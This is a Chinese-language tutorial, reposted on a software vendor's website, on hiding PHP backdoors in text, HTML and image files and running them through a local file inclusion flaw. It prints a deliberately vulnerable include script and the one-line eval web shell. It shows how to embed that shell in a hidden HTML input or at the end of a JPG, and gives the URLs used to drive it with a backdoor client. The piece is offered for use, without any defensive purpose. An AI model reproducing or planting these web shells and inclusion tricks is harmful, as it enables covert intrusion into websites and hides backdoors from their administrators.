没有找到合适的产品?
联系客服协助选型:023-68661681
提供3000多款全球软件/控件产品
针对软件研发的各个阶段提供专业培训与技术咨询
根据客户需求提供定制化的软件开发服务
全球知名设计软件,显著提升设计质量
打造以经营为中心,实现生产过程透明化管理
帮助企业合理产能分配,提高资源利用率
快速打造数字化生产线,实现全流程追溯
生产过程精准追溯,满足企业合规要求
以六西格玛为理论基础,实现产品质量全数字化管理
通过大屏电子看板,实现车间透明化管理
对设备进行全生命周期管理,提高设备综合利用率
实现设备数据的实时采集与监控
利用数字化技术提升油气勘探的效率和成功率
钻井计划优化、实时监控和风险评估
提供业务洞察与决策支持实现数据驱动决策
翻译|其它|编辑:郝浩|2007-12-29 11:32:11.000|阅读 808 次
概述:
# 界面/图表报表/文档/IDE等千款热门软控件火热销售中 >>
要知道如果光把 PHP 语句放到图片里是无论如何也不能执行的,因为 PHP 只解析扩展名为 php 的文件。所以说要能使隐藏在图片里的 PHP 语句执行。我们就的借助 PHP 中的调用函数 :include 、require 等。
我们还记得前些日子把木马隐藏到图片的文章吧。也就是在 PHP 文件里用 include("x.gif")这样的语句来调用隐藏在图片的木马语句。ASP 中语句也类似。看似非常隐蔽但直接调用图片对稍微懂点 PHP 的人就不难发现可疑之处。由于 URL 里用 GET 方式很难传递参数,这就使得插入木马的性能得不到发挥。
include 函数在 PHP 中使用的比较频繁,所以引起的安全问题也实在太多,例如 PHPWIND1.36的漏洞就是因为 include 后面的变量没做过滤引起的。由此我们就可以构造类似的语句来插入到 PHP 文件中。然后把木马隐藏到图片或 HTML 文件里,可以说隐蔽性就更高了。如在 PHPWIND 论坛里插入下面的语句:<‘’?@include includ/.$PHPWIND_ROOT;? <mailto:?@include 'includ/'.$PHPWIND_ROOT;?>> 一般管理员是无法看出来的。
有了include 函数来辅助帮忙我们就可以把 PHP 木马隐藏到 诸如 txt、html 和图片文件等很多类型的文件里来了。因为 txt、html 和图片文件这三种类型的文件最无论在论坛还是文章系统里是最为常见的了,下面我们就依次来做测试。
首先建立一 PHP 文件 test.php 文件内容为:
以下为引用的内容:
<?php
$test=$_GET['test'];
@include 'test/'.$test;
?>
Txt 文件一般都是说明文件,所以我们把一句话木马放到目录的说明文件里就 OK 了。随便建立一个 TXT 文件 t.txt。我们把一句话木马<?eval($_POST[cmd]);?>粘贴到 t.txt 文件里。然后访问 http://localhost/test/test.php?test=../t.txt <http://localhost/phpw/index.php?PHPWIND_ROOT=../robots.txt> 如果你看到 t.txt 的内容就证明 Ok 了, 然后把在 lanker 微型 PHP 后门客户端 木马地址添入 http://localhost/test/test.php?test=../t.txt <http://localhost/phpw/index.php?PHPWIND_ROOT=../robots.txt> 密码里添入 cmd 就可以了,执行返回的结果都可以看到。
对于 HTML 的文件,一般都为模版文件。为了使插入到 HTML 的文件的木马能被调用执行而且不被显示出来,我们可以在 HTML 里加入一个隐藏属性的文本框 ,如:<input type=hidden value="<?eval($_POST[cmd]);?>"> 然后使用方法同上。执行的返回结果一般都可以查看源文件看到。 如使用查看本程序目录功能。查看源文件内容为 <input type=hidden value="C:\Uniserver2_7s\www\test"> 我可以得到目录为 C:\Uniserver2_7s\www\test。
下面我们说说图片文件,要说最为毒的一招莫过于把木马隐藏到图片里。我们可以直接对一个图片进行编辑,把<?eval($_POST[cmd]);?>插入到图片末尾。
经测试一般都不会对图片造成影响。然后同样方法客户端木马地址添入 <http://localhost/test/test.php?test=../1.jpg>我们查看PHP环境变量 返回的是结果是原图片。
这里可能要和我们想象的结果有些差距了,其实命令已经运行了,只是返回的结果看不到而已,因为这是真正的GIF文件,所以是不会显示返回结果的,为了证明是否真的执行了命令我们 执行上传文件命令。果不出所料,文件已经成功上传到服务器上。这样伪造的优点是隐蔽性好。缺点也自然不用说了是没回显。如果你想看到返回的结果,那就拿出记事本伪造一个假的图片文件吧。
到这里就基本测试完了,怎样隐蔽PHP后门就看你自己的选择了。
本站文章除注明转载外,均为本站原创或翻译。欢迎任何形式的转载,但请务必注明出处、不得修改原文相关链接,如果存在内容上的异议请邮件反馈至chenjj@evget.com
文章转载自:网页教学网接DevExpress原厂商通知,将于近日上调旗下产品授权价格,现在下单客户可享受优惠报价!
面对“数字中国”建设和中国制造2025战略实施的机遇期,中车信息公司紧跟时代的步伐,以“集约化、专业化、标准化、精益化、一体化、平台化”为工作目标,大力推进信息服务、工业软件等核心产品及业务的发展。在慧都3D解决方案的实施下,清软英泰建成了多模型来源的综合轻量化显示平台、实现文件不失真的百倍压缩比、针对模型中的大模型文件,在展示平台上进行流畅展示,提升工作效率,优化了使用体验。
本站的模型资源均免费下载,登录后即可下载。模型仅供学习交流,勿做商业用途。
本站的模型资源均免费下载,登录后即可下载。模型仅供学习交流,勿做商业用途。
服务电话
重庆/ 023-68661681
华东/ 13452821722
华南/ 18100878085
华北/ 17347785263
客户支持
技术支持咨询服务
服务热线:400-700-1020
邮箱:sales@evget.com
关注我们
地址 : 重庆市九龙坡区火炬大道69号6幢
慧都科技 版权所有 Copyright 2003-
2025 渝ICP备12000582号-13 渝公网安备
50010702500608号